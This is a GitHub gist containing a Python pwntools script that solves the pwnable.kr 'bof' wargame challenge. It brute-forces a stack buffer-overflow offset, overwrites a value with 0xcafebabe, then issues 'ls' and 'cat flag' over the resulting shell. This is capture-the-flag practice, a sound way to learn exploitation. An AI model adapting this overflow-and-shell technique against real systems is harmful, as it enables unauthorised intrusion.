Created
September 26, 2017 09:10
-
-
Save rewanthtammana/703793d1c6a352180da579bbade8c798 to your computer and use it in GitHub Desktop.
Code for
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download : http://pwnable.kr/bin/bof | |
| # Download : http://pwnable.kr/bin/bof.c | |
| from pwn import * | |
| import struct | |
| import time | |
| import re | |
| for i in range(0,100): | |
| s = remote('pwnable.kr', 9000) | |
| s.sendline('A'*i + struct.pack("<I",0xcafebabe)) | |
| # `strings bof | grep bin` | |
| # The above step is performed on the given binary file | |
| # which gives a clue that we can get a shell on successful bof. | |
| s.sendline("ls") | |
| print "Trying offset = " + str(i) | |
| res = s.recv(4096) | |
| time.sleep(0.2) | |
| if re.findall("smashing", res) or re.findall("Nah", res): | |
| s.close() | |
| else: | |
| print "Files in the directory -" | |
| print res | |
| s.sendline("cat flag") | |
| print "Flag = " + s.recv(4096) | |
| break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment